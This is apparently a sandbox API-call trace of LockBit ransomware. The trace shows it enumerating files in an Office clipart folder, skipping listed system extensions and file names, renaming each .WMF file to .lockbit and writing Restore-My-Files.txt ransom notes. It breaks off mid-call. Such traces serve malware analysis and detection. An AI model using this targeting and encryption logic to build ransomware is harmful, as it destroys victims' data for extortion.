lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0101.975] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0101.975] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0101.975] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0101.975] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0101.975] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0101.975] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0101.975] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0101.975] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0101.975] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0101.975] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0101.975] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0101.975] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0101.975] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0101.975] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0101.975] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0101.975] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0101.975] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0101.976] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0101.976] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0101.976] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0101.976] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0101.976] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0101.976] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0101.976] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0101.976] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0101.976] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0101.976] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0101.976] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0101.976] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0101.976] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0101.976] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0101.976] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0101.976] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0101.976] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0101.976] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0101.976] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0101.976] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="AN00015_.WMF") returned 1 [0101.976] lstrcmpiW (lpString1="ntldr", lpString2="AN00015_.WMF") returned 1 [0101.976] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="AN00015_.WMF") returned 1 [0101.977] lstrcmpiW (lpString1="bootsect.bak", lpString2="AN00015_.WMF") returned 1 [0101.977] lstrcmpiW (lpString1="autorun.inf", lpString2="AN00015_.WMF") returned 1 [0101.977] lstrcmpiW (lpString1="thumbs.db", lpString2="AN00015_.WMF") returned 1 [0101.977] lstrcmpiW (lpString1="iconcache.db", lpString2="AN00015_.WMF") returned 1 [0101.977] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0101.977] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00015_.WMF") returned=".WMF" [0101.977] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0101.977] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0101.977] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0101.977] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0101.977] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0101.977] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0101.977] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0101.977] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0101.977] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0101.977] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0101.977] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0101.977] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0101.977] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0101.977] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0101.977] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0101.977] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0101.977] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0101.977] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0101.978] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0101.978] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0101.978] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0101.978] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0101.978] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0101.978] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0101.978] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0101.978] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0101.978] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0101.978] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0101.978] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00015_.WMF.lockbit") returned 72 [0101.978] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00015_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an00015_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xf00 [0101.979] CreateIoCompletionPort (FileHandle=0xf00, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0101.979] malloc (_Size=0x40068) returned 0x3db00b8 [0101.979] GetFileSizeEx (in: hFile=0xf00, lpFileSize=0x3db00d0 | out: lpFileSize=0x3db00d0*=4734) returned 1 [0101.979] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0101.980] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0101.981] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3df00ec, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3df00ec) returned 0x0 [0101.981] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0101.982] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0101.982] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3df00fc, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3df00fc) returned 0x0 [0101.982] ReadFile (in: hFile=0xf00, lpBuffer=0x3db00ec, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3db00b8 | out: lpBuffer=0x3db00ec*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3db00b8) returned 1 [0101.989] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00015_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00015_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0101.989] malloc (_Size=0xa6) returned 0x77d800 [0101.989] NtSetInformationFile (FileHandle=0xf00, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d800, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0101.992] free (_Block=0x77d800) [0101.992] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00015_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0101.992] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0101.992] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0101.992] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7e812b00, ftCreationTime.dwHighDateTime=0x1bd4b16, ftLastAccessTime.dwLowDateTime=0x5eb8e810, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7e812b00, ftLastWriteTime.dwHighDateTime=0x1bd4b16, nFileSizeHigh=0x0, nFileSizeLow=0x1634, dwReserved0=0x0, dwReserved1=0x0, cFileName="AN00790_.WMF", cAlternateFileName="")) returned 1 [0101.992] lstrcmpiW (lpString1=".", lpString2="AN00790_.WMF") returned -1 [0101.993] lstrcmpiW (lpString1="..", lpString2="AN00790_.WMF") returned -1 [0101.993] PathFindExtensionW (pszPath="AN00790_.WMF") returned=".WMF" [0101.993] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0101.993] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0101.993] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0101.993] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0101.993] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0101.993] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0101.993] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0101.993] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0101.993] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0101.993] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0101.993] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0101.993] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0101.993] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0101.993] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0101.993] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0101.993] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0101.993] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0101.993] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0101.993] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0101.993] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0101.993] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0101.993] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0101.994] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0101.994] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0101.994] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0101.994] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0101.994] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0101.994] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0101.994] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0101.994] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0101.994] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0101.994] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0101.994] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0101.994] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0101.994] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0101.994] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0101.994] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0101.994] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0101.994] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0101.994] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0101.994] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0101.994] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0101.994] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0101.995] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0101.995] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0101.995] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0101.995] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0101.995] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="AN00790_.WMF") returned 1 [0101.995] lstrcmpiW (lpString1="ntldr", lpString2="AN00790_.WMF") returned 1 [0101.995] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="AN00790_.WMF") returned 1 [0101.995] lstrcmpiW (lpString1="bootsect.bak", lpString2="AN00790_.WMF") returned 1 [0101.995] lstrcmpiW (lpString1="autorun.inf", lpString2="AN00790_.WMF") returned 1 [0101.995] lstrcmpiW (lpString1="thumbs.db", lpString2="AN00790_.WMF") returned 1 [0101.995] lstrcmpiW (lpString1="iconcache.db", lpString2="AN00790_.WMF") returned 1 [0101.995] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0101.995] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00790_.WMF") returned=".WMF" [0101.995] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0101.995] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0101.995] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0101.995] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0101.995] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0101.995] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0101.996] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0101.996] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0101.996] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0101.996] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0101.996] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0101.996] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0101.996] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0101.996] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0101.996] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0101.996] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0101.996] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0101.996] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0101.996] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0101.996] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0101.996] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0101.996] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0101.996] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0101.996] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0101.996] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0101.997] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0101.997] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0101.997] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0101.997] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00790_.WMF.lockbit") returned 72 [0101.997] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00790_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an00790_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xcac [0102.005] CreateIoCompletionPort (FileHandle=0xcac, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0102.005] malloc (_Size=0x40068) returned 0x3d70048 [0102.006] GetFileSizeEx (in: hFile=0xcac, lpFileSize=0x3d70060 | out: lpFileSize=0x3d70060*=5684) returned 1 [0102.006] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0102.007] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0102.007] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db007c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db007c) returned 0x0 [0102.007] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0102.008] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0102.008] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db008c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db008c) returned 0x0 [0102.008] ReadFile (in: hFile=0xcac, lpBuffer=0x3d7007c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70048 | out: lpBuffer=0x3d7007c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70048) returned 1 [0102.011] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00790_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00790_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0102.011] malloc (_Size=0xa6) returned 0x77d800 [0102.011] NtSetInformationFile (FileHandle=0xcac, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d800, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0102.012] free (_Block=0x77d800) [0102.012] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00790_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0102.012] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0102.012] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0102.012] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa9eb2200, ftCreationTime.dwHighDateTime=0x1bd4ae4, ftLastAccessTime.dwLowDateTime=0x5133d8d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xa9eb2200, ftLastWriteTime.dwHighDateTime=0x1bd4ae4, nFileSizeHigh=0x0, nFileSizeLow=0x5062, dwReserved0=0x0, dwReserved1=0x0, cFileName="AN00853_.WMF", cAlternateFileName="")) returned 1 [0102.013] lstrcmpiW (lpString1=".", lpString2="AN00853_.WMF") returned -1 [0102.013] lstrcmpiW (lpString1="..", lpString2="AN00853_.WMF") returned -1 [0102.013] PathFindExtensionW (pszPath="AN00853_.WMF") returned=".WMF" [0102.013] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0102.013] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0102.013] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0102.013] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0102.013] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0102.013] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0102.013] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0102.013] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0102.013] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0102.013] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0102.013] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0102.013] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0102.013] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0102.013] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0102.013] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0102.013] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0102.013] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0102.013] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0102.013] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0102.013] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0102.013] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0102.014] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0102.014] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0102.014] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0102.014] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0102.014] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0102.014] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0102.014] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0102.014] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0102.014] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0102.014] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0102.014] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0102.014] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0102.014] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0102.014] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0102.014] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0102.014] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0102.014] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0102.014] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0102.014] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0102.014] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0102.014] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0102.014] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0102.015] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0102.015] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0102.015] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0102.015] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0102.015] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="AN00853_.WMF") returned 1 [0102.015] lstrcmpiW (lpString1="ntldr", lpString2="AN00853_.WMF") returned 1 [0102.015] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="AN00853_.WMF") returned 1 [0102.015] lstrcmpiW (lpString1="bootsect.bak", lpString2="AN00853_.WMF") returned 1 [0102.015] lstrcmpiW (lpString1="autorun.inf", lpString2="AN00853_.WMF") returned 1 [0102.015] lstrcmpiW (lpString1="thumbs.db", lpString2="AN00853_.WMF") returned 1 [0102.015] lstrcmpiW (lpString1="iconcache.db", lpString2="AN00853_.WMF") returned 1 [0102.015] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0102.015] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00853_.WMF") returned=".WMF" [0102.015] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0102.015] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0102.015] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0102.015] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0102.015] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0102.015] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0102.015] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0102.015] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0102.015] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0102.015] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0102.015] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0102.015] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0102.016] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0102.016] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0102.016] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0102.016] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0102.016] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0102.016] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0102.016] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0102.016] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0102.016] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0102.016] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0102.016] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0102.016] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0102.016] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0102.016] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0102.016] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0102.016] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0102.016] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00853_.WMF.lockbit") returned 72 [0102.016] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00853_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an00853_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xf04 [0102.017] CreateIoCompletionPort (FileHandle=0xf04, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0102.017] malloc (_Size=0x40068) returned 0x3df0128 [0102.018] GetFileSizeEx (in: hFile=0xf04, lpFileSize=0x3df0140 | out: 